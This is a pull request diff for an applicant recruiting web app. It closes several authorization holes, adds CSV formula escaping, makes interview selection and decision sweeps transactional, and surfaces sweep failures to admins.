### PR TITLE
Fix six access-control and race-condition bugs before the cycle opens

### DIFF
--- a/app/admin/settings/page.tsx
+++ b/app/admin/settings/page.tsx
@@ -72,7 +72,16 @@ export default function AdminSettingsPage() {
       });
       if (res.ok) {
         setConfig((prev) => prev ? { ...prev, currentStep: selectedStep, updatedAt: new Date() } : null);
-        toast.success("Recruiting step updated!");
+
+        // The step is saved either way; the sweep that runs on the Day 2/3
+        // transitions can still fail, and a half-swept cycle must not look
+        // like a clean one.
+        const { sweepError } = await res.json().catch(() => ({ sweepError: undefined }));
+        if (sweepError) {
+          toast.error(sweepError, { duration: 12000 });
+        } else {
+          toast.success("Recruiting step updated!");
+        }
 
         // If transitioning to a release step, automatically trigger the batching email process
         const releaseSteps: RecruitingStep[] = [

--- a/app/api/admin/applications/[id]/interview-scorecard/route.ts
+++ b/app/api/admin/applications/[id]/interview-scorecard/route.ts
@@ -8,7 +8,7 @@ import { ScorecardSubmission, ScorecardConfig } from "@/lib/models/Scorecard";
 import { ApplicationStatus } from "@/lib/models/Application";
 import { Team, UserRole } from "@/lib/models/User";
 import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
-import { checkTeamAccess, resolveScorecardSystem } from "@/lib/auth/teamAccess";
+import { checkTeamAccess, resolveScorecardSystem, STAFF_ROLES } from "@/lib/auth/teamAccess";
 import { slugifySystem } from "@/lib/firebase/utils";
 import { logger } from "@/lib/logger";
 
@@ -36,8 +36,7 @@ export async function GET(
     const user = await getUser(userId);
 
     // Verify user has staff-level access
-    const staffRoles = [UserRole.ADMIN, UserRole.TEAM_CAPTAIN_OB, UserRole.SYSTEM_LEAD, UserRole.REVIEWER];
-    if (!user || !staffRoles.includes(user.role)) {
+    if (!user || !STAFF_ROLES.includes(user.role)) {
       return NextResponse.json({ error: "Forbidden: Staff access required" }, { status: 403 });
     }
 
@@ -158,8 +157,7 @@ export async function POST(
     const user = await getUser(userId);
 
     // Verify user has staff-level access
-    const staffRoles = [UserRole.ADMIN, UserRole.TEAM_CAPTAIN_OB, UserRole.SYSTEM_LEAD, UserRole.REVIEWER];
-    if (!user || !staffRoles.includes(user.role)) {
+    if (!user || !STAFF_ROLES.includes(user.role)) {
       return NextResponse.json({ error: "Forbidden: Staff access required" }, { status: 403 });
     }
 

--- a/app/api/admin/applications/[id]/interview-scorecard/route.ts
+++ b/app/api/admin/applications/[id]/interview-scorecard/route.ts
@@ -8,7 +8,7 @@ import { ScorecardSubmission, ScorecardConfig } from "@/lib/models/Scorecard";
 import { ApplicationStatus } from "@/lib/models/Application";
 import { Team, UserRole } from "@/lib/models/User";
 import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
-import { checkTeamAccess } from "@/lib/auth/teamAccess";
+import { checkTeamAccess, resolveScorecardSystem } from "@/lib/auth/teamAccess";
 import { slugifySystem } from "@/lib/firebase/utils";
 import { logger } from "@/lib/logger";
 
@@ -52,26 +52,20 @@ export async function GET(
       return NextResponse.json({ error: teamAccessError }, { status: 403 });
     }
 
-    // Get requested system from query params, or default based on user role
     const url = new URL(request.url);
-    const requestedSystem = url.searchParams.get("system");
 
     // Check if user is privileged (can view multiple systems)
     const isHighPrivileged = user?.role === UserRole.ADMIN ||
       user?.role === UserRole.TEAM_CAPTAIN_OB;
 
-    // Determine which system to use
-    let targetSystem: string | undefined = requestedSystem || undefined;
-    if (!targetSystem) {
-      // For non-privileged users (reviewers, system leads), default to their own system
-      if (!isHighPrivileged && user?.memberProfile?.system) {
-        targetSystem = user.memberProfile.system;
-      } else {
-        // For admins/team captains, default to first preferred system of applicant
-        const preferredSystems = application.preferredSystems || [];
-        targetSystem = preferredSystems[0];
-      }
+    // Which system this caller is allowed to look at. Leads and reviewers are
+    // pinned to their own — ?system= used to be honoured for everyone, which
+    // exposed other systems' aggregate scores for the same candidate.
+    const resolvedSystem = resolveScorecardSystem(user, application, url.searchParams.get("system"));
+    if (resolvedSystem.error) {
+      return NextResponse.json({ error: resolvedSystem.error }, { status: 403 });
     }
+    const targetSystem = resolvedSystem.system;
 
     // Get INTERVIEW scorecard config from database
     let config: ScorecardConfig | null = null;
@@ -184,6 +178,14 @@ export async function POST(
       return NextResponse.json({ error: teamAccessError }, { status: 403 });
     }
 
+    // Which system this score is being filed under. Unvalidated, this let a
+    // reviewer file into another system's pool and move its aggregate.
+    const resolvedSystem = resolveScorecardSystem(user, application, system);
+    if (resolvedSystem.error) {
+      return NextResponse.json({ error: resolvedSystem.error }, { status: 403 });
+    }
+    const targetSystem = resolvedSystem.system;
+
     // Same rule as review scorecards: an unsubmitted draft can't be scored.
     if (application.status === ApplicationStatus.IN_PROGRESS) {
       return NextResponse.json(
@@ -196,7 +198,7 @@ export async function POST(
     const collectionRef = adminDb.collection("applications").doc(id).collection("interviewScorecards");
 
     // Use a deterministic document ID based on reviewerId and system for idempotency
-    const docId = system ? `${userId}_${slugifySystem(system)}` : userId;
+    const docId = targetSystem ? `${userId}_${slugifySystem(targetSystem)}` : userId;
     const docRef = collectionRef.doc(docId);
 
     // Use set with merge to make this idempotent
@@ -205,7 +207,7 @@ export async function POST(
       applicationId: id,
       reviewerId: userId,
       reviewerName: user?.name || "Unknown",
-      system: system || undefined,
+      system: targetSystem || undefined,
       scorecardType: "interview",
       data,
       submittedAt: new Date(),
@@ -215,9 +217,9 @@ export async function POST(
     await docRef.set(submissionData, { merge: true });
 
     // Update aggregate rating atomically
-    if (system) {
+    if (targetSystem) {
       try {
-        await updateAggregateRating(id, system, "interview", application.team);
+        await updateAggregateRating(id, targetSystem, "interview", application.team);
       } catch (err) {
         // Log but don't fail the request - the scorecard was saved
         logger.error(err, "Failed to update interview aggregate rating");

--- a/app/api/admin/applications/[id]/interview/[system]/route.ts
+++ b/app/api/admin/applications/[id]/interview/[system]/route.ts
@@ -2,9 +2,8 @@ import { NextRequest, NextResponse } from "next/server";
 import { adminAuth, adminDb } from "@/lib/firebase/admin";
 import { updateInterviewOfferStatus, getApplication } from "@/lib/firebase/applications";
 import { InterviewEventStatus } from "@/lib/models/Application";
-import { UserRole, User } from "@/lib/models/User";
 import { getUser } from "@/lib/firebase/users";
-import { checkTeamAccess } from "@/lib/auth/teamAccess";
+import { checkTeamAccess, resolveScorecardSystem, STAFF_ROLES } from "@/lib/auth/teamAccess";
 import { logger } from "@/lib/logger";
 
 
@@ -33,8 +32,7 @@ export async function PATCH(
     }
 
     // Only staff roles can update interview status
-    const staffRoles = [UserRole.ADMIN, UserRole.TEAM_CAPTAIN_OB, UserRole.SYSTEM_LEAD, UserRole.REVIEWER];
-    if (!staffRoles.includes(currentUser.role)) {
+    if (!STAFF_ROLES.includes(currentUser.role)) {
       return NextResponse.json({ error: "Forbidden" }, { status: 403 });
     }
 
@@ -48,6 +46,18 @@ export async function PATCH(
     if (teamAccessError) {
       return NextResponse.json({ error: teamAccessError }, { status: 403 });
     }
+
+    // checkTeamAccess only proves the caller's system is somewhere on this
+    // application; the path segment is the offer actually being mutated, so
+    // pin it the same way the scorecard routes do — leads and reviewers to
+    // their own system, admins and captains to a system that exists on the
+    // team. Without this a lead for system A could mark system B's offer
+    // completed or cancelled on any multi-system application.
+    const resolved = resolveScorecardSystem(currentUser, application, decodeURIComponent(system));
+    if (resolved.error || !resolved.system) {
+      return NextResponse.json({ error: resolved.error ?? "Invalid system" }, { status: 403 });
+    }
+    const targetSystem = resolved.system;
 
     const body = await request.json();
     const { status, cancelReason } = body;
@@ -65,7 +75,7 @@ export async function PATCH(
     }
 
     // Update the interview offer status
-    const updatedApp = await updateInterviewOfferStatus(id, decodeURIComponent(system), {
+    const updatedApp = await updateInterviewOfferStatus(id, targetSystem, {
       status,
       cancelReason: status === InterviewEventStatus.CANCELLED ? cancelReason : undefined,
     });

--- a/app/api/admin/applications/[id]/scorecard/route.ts
+++ b/app/api/admin/applications/[id]/scorecard/route.ts
@@ -8,7 +8,7 @@ import { ScorecardSubmission, ScorecardConfig, ScorecardFieldConfig } from "@/li
 import { ApplicationStatus } from "@/lib/models/Application";
 import { Team, UserRole } from "@/lib/models/User";
 import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
-import { checkTeamAccess } from "@/lib/auth/teamAccess";
+import { checkTeamAccess, resolveScorecardSystem } from "@/lib/auth/teamAccess";
 import { slugifySystem } from "@/lib/firebase/utils";
 import { logger } from "@/lib/logger";
 
@@ -52,26 +52,20 @@ export async function GET(
       return NextResponse.json({ error: teamAccessError }, { status: 403 });
     }
 
-    // Get requested system from query params, or default based on user role
     const url = new URL(request.url);
-    const requestedSystem = url.searchParams.get("system");
 
     // Check if user is privileged (can view multiple systems)
     const isHighPrivileged = user?.role === UserRole.ADMIN ||
       user?.role === UserRole.TEAM_CAPTAIN_OB;
 
-    // Determine which system to use
-    let targetSystem: string | undefined = requestedSystem || undefined;
-    if (!targetSystem) {
-      // For non-privileged users (reviewers, system leads), default to their own system
-      if (!isHighPrivileged && user?.memberProfile?.system) {
-        targetSystem = user.memberProfile.system;
-      } else {
-        // For admins/team captains, default to first preferred system of applicant
-        const preferredSystems = application.preferredSystems || [];
-        targetSystem = preferredSystems[0];
-      }
+    // Which system this caller is allowed to look at. Leads and reviewers are
+    // pinned to their own — ?system= used to be honoured for everyone, which
+    // exposed other systems' aggregate scores for the same candidate.
+    const resolvedSystem = resolveScorecardSystem(user, application, url.searchParams.get("system"));
+    if (resolvedSystem.error) {
+      return NextResponse.json({ error: resolvedSystem.error }, { status: 403 });
     }
+    const targetSystem = resolvedSystem.system;
 
     // Get config from database (no fallback to hardcoded config)
     let config: ScorecardConfig | null = null;
@@ -184,6 +178,14 @@ export async function POST(
       return NextResponse.json({ error: teamAccessError }, { status: 403 });
     }
 
+    // Which system this score is being filed under. Unvalidated, this let a
+    // reviewer file into another system's pool and move its aggregate.
+    const resolvedSystem = resolveScorecardSystem(user, application, system);
+    if (resolvedSystem.error) {
+      return NextResponse.json({ error: resolvedSystem.error }, { status: 403 });
+    }
+    const targetSystem = resolvedSystem.system;
+
     // Drafts are visible to staff but must not be scored — the applicant is
     // still editing, so there is nothing stable to review yet. (PM's call.)
     if (application.status === ApplicationStatus.IN_PROGRESS) {
@@ -197,7 +199,7 @@ export async function POST(
 
     // Use a deterministic document ID based on reviewerId and system for idempotency
     // This prevents race conditions where concurrent requests create duplicate scorecards
-    const docId = system ? `${userId}_${slugifySystem(system)}` : userId;
+    const docId = targetSystem ? `${userId}_${slugifySystem(targetSystem)}` : userId;
     const docRef = collectionRef.doc(docId);
 
     // Use set with merge to make this idempotent - creates if not exists, updates if exists
@@ -206,7 +208,7 @@ export async function POST(
       applicationId: id,
       reviewerId: userId,
       reviewerName: user?.name || "Unknown",
-      system: system || undefined,
+      system: targetSystem || undefined,
       data,
       submittedAt: new Date(),
       updatedAt: new Date(),
@@ -215,9 +217,9 @@ export async function POST(
     await docRef.set(submissionData, { merge: true });
 
     // Update aggregate rating atomically
-    if (system) {
+    if (targetSystem) {
       try {
-        await updateAggregateRating(id, system, "review", application.team);
+        await updateAggregateRating(id, targetSystem, "review", application.team);
       } catch (err) {
         // Log but don't fail the request - the scorecard was saved
         logger.error(err, "Failed to update aggregate rating");

--- a/app/api/admin/applications/[id]/scorecard/route.ts
+++ b/app/api/admin/applications/[id]/scorecard/route.ts
@@ -8,7 +8,7 @@ import { ScorecardSubmission, ScorecardConfig, ScorecardFieldConfig } from "@/li
 import { ApplicationStatus } from "@/lib/models/Application";
 import { Team, UserRole } from "@/lib/models/User";
 import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
-import { checkTeamAccess, resolveScorecardSystem } from "@/lib/auth/teamAccess";
+import { checkTeamAccess, resolveScorecardSystem, STAFF_ROLES } from "@/lib/auth/teamAccess";
 import { slugifySystem } from "@/lib/firebase/utils";
 import { logger } from "@/lib/logger";
 
@@ -36,8 +36,7 @@ export async function GET(
     const user = await getUser(userId);
 
     // Verify user has staff-level access
-    const staffRoles = [UserRole.ADMIN, UserRole.TEAM_CAPTAIN_OB, UserRole.SYSTEM_LEAD, UserRole.REVIEWER];
-    if (!user || !staffRoles.includes(user.role)) {
+    if (!user || !STAFF_ROLES.includes(user.role)) {
       return NextResponse.json({ error: "Forbidden: Staff access required" }, { status: 403 });
     }
 
@@ -158,8 +157,7 @@ export async function POST(
     const user = await getUser(userId);
 
     // Verify user has staff-level access
-    const staffRoles = [UserRole.ADMIN, UserRole.TEAM_CAPTAIN_OB, UserRole.SYSTEM_LEAD, UserRole.REVIEWER];
-    if (!user || !staffRoles.includes(user.role)) {
+    if (!user || !STAFF_ROLES.includes(user.role)) {
       return NextResponse.json({ error: "Forbidden: Staff access required" }, { status: 403 });
     }
 

--- a/app/api/admin/applications/export-csv/route.ts
+++ b/app/api/admin/applications/export-csv/route.ts
@@ -16,7 +16,14 @@ import { logger } from "@/lib/logger";
 
 function escapeCell(value: unknown): string {
   if (value === null || value === undefined) return "";
-  const str = String(value);
+  let str = String(value);
+  // Neutralize spreadsheet formulas. Excel and Sheets evaluate a cell starting
+  // with any of these *after* the CSV parser has stripped the quoting below, so
+  // quoting is no defense — and applicants write the free-text answers that end
+  // up in this export. A leading apostrophe forces the cell to text.
+  if (/^[=+\-@\t\r]/.test(str)) {
+    str = `'${str}`;
+  }
   // Wrap in quotes if it contains commas, quotes, or newlines
   if (str.includes(",") || str.includes('"') || str.includes("\n")) {
     return `"${str.replace(/"/g, '""')}"`;

--- a/app/api/admin/config/recruiting/route.ts
+++ b/app/api/admin/config/recruiting/route.ts
@@ -48,23 +48,27 @@ export async function POST(request: NextRequest) {
 
     await updateRecruitingStep(step, uid);
 
+    // Sweep failures are reported back, not just logged: the step itself has
+    // already been written, so a silent failure looks like success while the
+    // cycle sits half-swept. The fix is to re-save the same step, which
+    // re-runs the sweep from where it got to.
+    let sweepError: string | undefined;
+
     // Interview scheduling window has closed - reject applicants who never
-    // booked a slot.
+    // booked a slot. This transition is one-shot, so a swallowed failure here
+    // is harder to notice than the Day 2/3 case.
     if (step === RecruitingStep.CLOSE_INTERVIEWS) {
       try {
         const rejectedIds = await autoRejectUnscheduledInterviewApplicants();
         logger.info({ rejectedCount: rejectedIds.length }, "Swept unscheduled interview applicants");
       } catch (err) {
         logger.error({ err }, "Failed to sweep unscheduled interview applicants");
+        sweepError = "The step was saved, but the unscheduled-interview sweep did not finish. Save this same step again to re-run it.";
       }
     }
 
     // Entering Day 2/3 locks the previous day's acceptances: expire unanswered
     // offers and reject committed applicants' other applications.
-    // A failure here leaves the cycle half-swept, so it is reported back rather
-    // than only logged — the step itself has already been written, and the fix
-    // is to re-save the same step, which re-runs the sweep from where it got to.
-    let sweepError: string | undefined;
     if (step === RecruitingStep.RELEASE_DECISIONS_DAY2 || step === RecruitingStep.RELEASE_DECISIONS_DAY3) {
       try {
         const result = await sweepOnDecisionAdvance(step);

--- a/app/api/admin/config/recruiting/route.ts
+++ b/app/api/admin/config/recruiting/route.ts
@@ -61,6 +61,10 @@ export async function POST(request: NextRequest) {
 
     // Entering Day 2/3 locks the previous day's acceptances: expire unanswered
     // offers and reject committed applicants' other applications.
+    // A failure here leaves the cycle half-swept, so it is reported back rather
+    // than only logged — the step itself has already been written, and the fix
+    // is to re-save the same step, which re-runs the sweep from where it got to.
+    let sweepError: string | undefined;
     if (step === RecruitingStep.RELEASE_DECISIONS_DAY2 || step === RecruitingStep.RELEASE_DECISIONS_DAY3) {
       try {
         const result = await sweepOnDecisionAdvance(step);
@@ -70,6 +74,7 @@ export async function POST(request: NextRequest) {
         );
       } catch (err) {
         logger.error({ err, step }, "Decision-advance sweep failed");
+        sweepError = "The step was saved, but the decision sweep did not finish. Save this same step again to re-run it.";
       }
     }
 
@@ -78,7 +83,7 @@ export async function POST(request: NextRequest) {
     // Invalidate applications because their computed status/ratings depend on the step
     appCache.invalidateApplications();
 
-    return NextResponse.json({ success: true, step });
+    return NextResponse.json({ success: true, step, ...(sweepError ? { sweepError } : {}) });
   } catch (error) {
     logger.error(error, "Failed to update recruiting step");
     

--- a/app/api/applications/[id]/interview/route.ts
+++ b/app/api/applications/[id]/interview/route.ts
@@ -203,6 +203,19 @@ export async function POST(request: NextRequest, { params }: RouteParams) {
       );
     }
 
+    // The choice is one-way. Selecting again cancels the offer they are
+    // actually holding and narrows preferredSystems a second time, which is
+    // what scopes reviewer and system-lead visibility — so a re-pick hides the
+    // applicant from a system that may be mid-review.
+    if (application.selectedInterviewSystem) {
+      return NextResponse.json(
+        {
+          error: `You have already selected ${application.selectedInterviewSystem} for your interview. Contact recruiting if you need to change it.`,
+        },
+        { status: 400 }
+      );
+    }
+
     const body = await request.json();
     const { system } = body;
 

--- a/app/api/applications/[id]/route.ts
+++ b/app/api/applications/[id]/route.ts
@@ -142,6 +142,15 @@ export async function PATCH(request: NextRequest, { params }: RouteParams) {
 
     const body = await request.json();
     const { preferredSystems, status } = body;
+
+    // An applicant may only move their own application between the two statuses
+    // they own. This value reaches Firestore unmodified, and nothing downstream
+    // re-derives how it got there — `POST /commit` gates on status === ACCEPTED
+    // alone, so an unvalidated status here is a self-accept.
+    if (status !== undefined && !EDITABLE_STATUSES.includes(status)) {
+      return NextResponse.json({ error: "Invalid status" }, { status: 400 });
+    }
+
     // Whitelist formData keys server-side — applicants own this document but
     // must not be able to write arbitrary fields into it.
     const formData = body.formData ? sanitizeIncomingFormData(body.formData) : undefined;

--- a/app/api/applications/[id]/route.ts
+++ b/app/api/applications/[id]/route.ts
@@ -228,7 +228,11 @@ export async function PATCH(request: NextRequest, { params }: RouteParams) {
       application = await updateApplication(id, updates);
     }
 
-    return NextResponse.json({ application }, { status: 200 });
+    // Same rule as GET: nothing applicant-facing leaves this route unsanitized.
+    return NextResponse.json(
+      { application: application ? sanitizeApplicationForApplicant(application, config.currentStep) : null },
+      { status: 200 }
+    );
   } catch (error) {
     logger.error({ err: error }, "Failed to update application");
     return NextResponse.json(

--- a/lib/auth/teamAccess.ts
+++ b/lib/auth/teamAccess.ts
@@ -10,7 +10,7 @@ import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
  * - TEAM_CAPTAIN_OB: must be on the same team
  * - SYSTEM_LEAD / REVIEWER: must be on the same team AND system in preferredSystems
  */
-const STAFF_ROLES: UserRole[] = [
+export const STAFF_ROLES: UserRole[] = [
     UserRole.ADMIN,
     UserRole.TEAM_CAPTAIN_OB,
     UserRole.SYSTEM_LEAD,

--- a/lib/auth/teamAccess.ts
+++ b/lib/auth/teamAccess.ts
@@ -1,5 +1,6 @@
-import { UserRole } from "@/lib/models/User";
+import { Team, UserRole } from "@/lib/models/User";
 import { Application } from "@/lib/models/Application";
+import { TEAM_SYSTEMS } from "@/lib/models/teamQuestions";
 
 /**
  * Check if a staff user has team-based access to an application.
@@ -9,7 +10,23 @@ import { Application } from "@/lib/models/Application";
  * - TEAM_CAPTAIN_OB: must be on the same team
  * - SYSTEM_LEAD / REVIEWER: must be on the same team AND system in preferredSystems
  */
+const STAFF_ROLES: UserRole[] = [
+    UserRole.ADMIN,
+    UserRole.TEAM_CAPTAIN_OB,
+    UserRole.SYSTEM_LEAD,
+    UserRole.REVIEWER,
+];
+
 export function checkTeamAccess(user: any, application: Application): string | null {
+    // Staff only. Without this gate every role the checks below don't name —
+    // APPLICANT above all — falls through to the closing `return null`, and a
+    // member of one team applying to another carries a memberProfile that
+    // satisfies the team check. The notes and tasks routes use this function as
+    // their only authorization, so the gate has to live here.
+    if (!STAFF_ROLES.includes(user?.role)) {
+        return "Forbidden: Staff access required";
+    }
+
     // Admins can access any application
     if (user?.role === UserRole.ADMIN) {
         return null;
@@ -37,4 +54,47 @@ export function checkTeamAccess(user: any, application: Application): string | n
     }
 
     return null;
+}
+
+/**
+ * Resolve which system a staff user may read or write a scorecard for.
+ * Returns the resolved system, or an error message if the caller asked for one
+ * they may not touch.
+ *
+ * Admins and team captains work across the whole team, so they may name any
+ * system that team actually has, and default to the applicant's first choice.
+ * System leads and reviewers are pinned to their own system.
+ *
+ * That pinning is the point: `system` used to arrive from the query string or
+ * request body unchecked and flow straight into the scorecard document id and
+ * into updateAggregateRating, so a reviewer with legitimate access to an
+ * application could drop a score into a different system's pool and move that
+ * system's aggregate for the candidate.
+ */
+export function resolveScorecardSystem(
+    // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    user: any,
+    application: Application,
+    requestedSystem: string | null | undefined
+): { system?: string; error?: string } {
+    const requested = requestedSystem || undefined;
+    const isHighPrivileged =
+        user?.role === UserRole.ADMIN || user?.role === UserRole.TEAM_CAPTAIN_OB;
+
+    if (!isHighPrivileged) {
+        const ownSystem = user?.memberProfile?.system;
+        if (!ownSystem) {
+            return { error: "Your account has no system assigned. Ask an admin to set your system." };
+        }
+        if (requested && requested !== ownSystem) {
+            return { error: `Forbidden: You can only score your own system (${ownSystem})` };
+        }
+        return { system: ownSystem };
+    }
+
+    const teamSystems = (TEAM_SYSTEMS[application.team as Team] || []).map((s) => s.value);
+    if (requested && !teamSystems.includes(requested)) {
+        return { error: `Invalid system for team ${application.team}` };
+    }
+    return { system: requested ?? application.preferredSystems?.[0] };
 }

--- a/lib/firebase/applications.ts
+++ b/lib/firebase/applications.ts
@@ -575,52 +575,75 @@ export async function selectInterviewSystem(
   applicationId: string,
   system: string
 ): Promise<Application | null> {
-  const application = await getApplication(applicationId);
-  if (!application) {
-    return null;
-  }
+  const applicationRef = adminDb.collection(APPLICATIONS_COLLECTION).doc(applicationId);
 
-  // Verify the system is in the offers
-  const offers = application.interviewOffers || [];
-  if (!offers.some((o) => o.system === system)) {
-    throw new Error(`No interview offer found for system: ${system}`);
-  }
+  // Transactional, like every other writer of interviewOffers in this file:
+  // it rewrites the whole array, so a concurrent staff status change through
+  // updateInterviewOfferStatus would otherwise be silently lost.
+  const found = await adminDb.runTransaction(async (transaction) => {
+    const doc = await transaction.get(applicationRef);
+    if (!doc.exists) return false;
 
-  // Verify this is for Combustion or Electric (not Solar)
-  if (application.team === Team.SOLAR) {
-    throw new Error("Solar team does not require system selection - all systems can be interviewed");
-  }
+    const application = doc.data() as Application;
+    const offers = normalizeInterviewOffers(application.interviewOffers) || [];
 
-  // Decline every other still-pending offer — the applicant is committing to
-  // `system`, and booking happens externally, so this is the only moment the
-  // app can record that choice (this used to happen on successful calendar
-  // booking; there is no booking step anymore).
-  const updatedOffers = offers.map((offer) =>
-    offer.system === system || offer.status !== InterviewEventStatus.PENDING
-      ? offer
-      : {
-          ...offer,
-          status: InterviewEventStatus.CANCELLED,
-          cancelledAt: new Date(),
-          cancelReason: "Applicant selected a different system for interview",
-        }
-  );
+    // The choice is one-way — re-selecting would cancel the offer the applicant
+    // is actually holding. The route rejects this first with a 400; the check
+    // is repeated here because the route's read and this write are not atomic.
+    if (application.selectedInterviewSystem) {
+      throw new Error("An interview system has already been selected for this application");
+    }
 
-  // Narrow preferredSystems to the chosen system. Reviewer/system-lead visibility
-  // (checkTeamAccess, requireStaffForApplication, and the system-scoped Firestore
-  // queries in this file) all key off preferredSystems array-contains, so this is
-  // what actually hides the applicant from the systems they didn't pick.
-  //
-  // Stash the full ranked list first (idempotent — a second call, if one ever
-  // happens, must not overwrite the real original with an already-narrowed
-  // one-element array). Records/CSV and future cross-system logic need the
-  // original ranking even after preferredSystems collapses.
-  return updateApplication(applicationId, {
-    selectedInterviewSystem: system,
-    originalPreferredSystems: application.originalPreferredSystems ?? application.preferredSystems,
-    preferredSystems: [system as ElectricSystem | SolarSystem | CombustionSystem],
-    interviewOffers: updatedOffers,
+    // Only a live offer can be chosen. This used to ask merely whether an offer
+    // for the system existed, so an applicant could pick one they had already
+    // declined and end up with every offer cancelled and no interview.
+    const chosen = offers.find((o) => o.system === system);
+    if (!chosen) {
+      throw new Error(`No interview offer found for system: ${system}`);
+    }
+    if (chosen.status !== InterviewEventStatus.PENDING) {
+      throw new Error(`The interview offer for ${system} is no longer open`);
+    }
+
+    // Verify this is for Combustion or Electric (not Solar)
+    if (application.team === Team.SOLAR) {
+      throw new Error("Solar team does not require system selection - all systems can be interviewed");
+    }
+
+    // Decline every other still-pending offer — the applicant is committing to
+    // `system`, and booking happens externally, so this is the only moment the
+    // app can record that choice (this used to happen on successful calendar
+    // booking; there is no booking step anymore).
+    const updatedOffers = offers.map((offer) =>
+      offer.system === system || offer.status !== InterviewEventStatus.PENDING
+        ? offer
+        : {
+            ...offer,
+            status: InterviewEventStatus.CANCELLED,
+            cancelledAt: new Date(),
+            cancelReason: "Applicant selected a different system for interview",
+          }
+    );
+
+    // Narrow preferredSystems to the chosen system. Reviewer/system-lead visibility
+    // (checkTeamAccess, requireStaffForApplication, and the system-scoped Firestore
+    // queries in this file) all key off preferredSystems array-contains, so this is
+    // what actually hides the applicant from the systems they didn't pick.
+    //
+    // Stash the full ranked list first. Records/CSV and future cross-system
+    // logic need the original ranking even after preferredSystems collapses.
+    transaction.update(applicationRef, {
+      selectedInterviewSystem: system,
+      originalPreferredSystems:
+        application.originalPreferredSystems ?? application.preferredSystems ?? [],
+      preferredSystems: [system as ElectricSystem | SolarSystem | CombustionSystem],
+      interviewOffers: updatedOffers.map(prepareOfferForFirestore),
+      updatedAt: FieldValue.serverTimestamp(),
+    });
+    return true;
   });
+
+  return found ? getApplication(applicationId) : null;
 }
 
 /**
@@ -941,10 +964,16 @@ export async function autoRejectUnscheduledInterviewApplicants(): Promise<string
  * transition, so admins must not skip decision days.
  *
  * Operational notes (review findings, PR #11):
- * - Writes are per-document, not batched. If a transient error interrupts a
- *   pass, both passes are idempotent AND re-triggerable: re-saving the same
- *   step in Admin → Settings re-runs this sweep (the route fires on the target
- *   step value, not on change), safely finishing the job.
+ * - Writes are per-document and each one is a transaction that re-reads the
+ *   document and re-applies the pass's predicate before writing. The query
+ *   snapshots driving these loops go stale over the length of a full sweep,
+ *   and an applicant committing in that window would otherwise be overwritten
+ *   with a rejection — a plain update() wins over the transaction in
+ *   respondToCommitment, so the guard belongs on this side.
+ * - If a transient error interrupts a pass, both passes are idempotent AND
+ *   re-triggerable: re-saving the same step in Admin → Settings re-runs this
+ *   sweep (the route fires on the target step value, not on change), safely
+ *   finishing the job.
  * - Pass 2 issues one query per committed user (N+1). Fine at this org's
  *   scale (hundreds of applicants); batch by `userId in [...]` (30 per clause)
  *   before reusing this at larger volumes.
@@ -968,20 +997,36 @@ export async function sweepOnDecisionAdvance(
     .where("status", "==", ApplicationStatus.ACCEPTED)
     .get();
 
-  for (const doc of acceptedSnap.docs) {
-    const d = doc.data();
-    if (d.trialDecision !== "advanced") continue;
+  // Both passes share this shape: the query snapshot is a cheap pre-filter, and
+  // the same predicate runs again inside a transaction against the live
+  // document before anything is written. The gap between query and write is
+  // minutes on a full sweep, and respondToCommitment is racing us in it — its
+  // transaction cannot stop a bare update(), so the re-check has to be here or
+  // the sweep rejects an applicant who committed while it was running.
+  const isExpirable = (d: FirebaseFirestore.DocumentData): boolean =>
+    d.status === ApplicationStatus.ACCEPTED &&
+    d.trialDecision === "advanced" &&
     // Offers released by THIS advance (or later days) still have their window.
-    if ((d.trialDecisionDay || 1) >= dayEntered) continue;
-    if (d.commitment) continue; // responded — COMMITTED/DECLINED handle status
+    (d.trialDecisionDay || 1) < dayEntered &&
+    !d.commitment; // responded — COMMITTED/DECLINED handle status
 
-    await doc.ref.update({
-      status: ApplicationStatus.REJECTED,
-      trialDecision: "rejected",
-      autoRejected: { reason: "offer_expired", at: now },
-      updatedAt: FieldValue.serverTimestamp(),
+  for (const doc of acceptedSnap.docs) {
+    if (!isExpirable(doc.data())) continue;
+
+    const wrote = await adminDb.runTransaction(async (transaction) => {
+      const fresh = await transaction.get(doc.ref);
+      if (!fresh.exists || !isExpirable(fresh.data()!)) return false;
+
+      transaction.update(doc.ref, {
+        status: ApplicationStatus.REJECTED,
+        trialDecision: "rejected",
+        autoRejected: { reason: "offer_expired", at: now },
+        updatedAt: FieldValue.serverTimestamp(),
+      });
+      return true;
     });
-    expired.push(doc.id);
+
+    if (wrote) expired.push(doc.id);
   }
 
   // --- Pass 2: committed applicants' other applications ---
@@ -1007,22 +1052,34 @@ export async function sweepOnDecisionAdvance(
       .where("userId", "==", userId)
       .get();
 
+    // Same read-then-write hazard as pass 1: a reneg landing mid-sweep turns
+    // one of these "other" applications into the one the applicant just
+    // committed to, and the stale snapshot would reject it.
+    const isCrossTeamRejectable = (d: FirebaseFirestore.DocumentData): boolean =>
+      !TERMINAL.includes(d.status) &&
+      d.status !== ApplicationStatus.WAITLISTED; // reneg pathway stays alive
+
     for (const other of others.docs) {
       if (other.id === doc.id) continue;
-      const st = other.data().status;
-      if (TERMINAL.includes(st)) continue;
-      if (st === ApplicationStatus.WAITLISTED) continue; // reneg pathway stays alive
+      if (!isCrossTeamRejectable(other.data())) continue;
 
-      await other.ref.update({
-        status: ApplicationStatus.REJECTED,
-        trialDecision: "rejected",
-        // Visible from the day being entered — the applicant caused this by
-        // accepting elsewhere, so there is nothing to mask.
-        trialDecisionDay: dayEntered,
-        autoRejected: { reason: "committed_elsewhere", at: now },
-        updatedAt: FieldValue.serverTimestamp(),
+      const wrote = await adminDb.runTransaction(async (transaction) => {
+        const fresh = await transaction.get(other.ref);
+        if (!fresh.exists || !isCrossTeamRejectable(fresh.data()!)) return false;
+
+        transaction.update(other.ref, {
+          status: ApplicationStatus.REJECTED,
+          trialDecision: "rejected",
+          // Visible from the day being entered — the applicant caused this by
+          // accepting elsewhere, so there is nothing to mask.
+          trialDecisionDay: dayEntered,
+          autoRejected: { reason: "committed_elsewhere", at: now },
+          updatedAt: FieldValue.serverTimestamp(),
+        });
+        return true;
       });
-      crossTeamRejected.push(other.id);
+
+      if (wrote) crossTeamRejected.push(other.id);
     }
   }
 


### PR DESCRIPTION
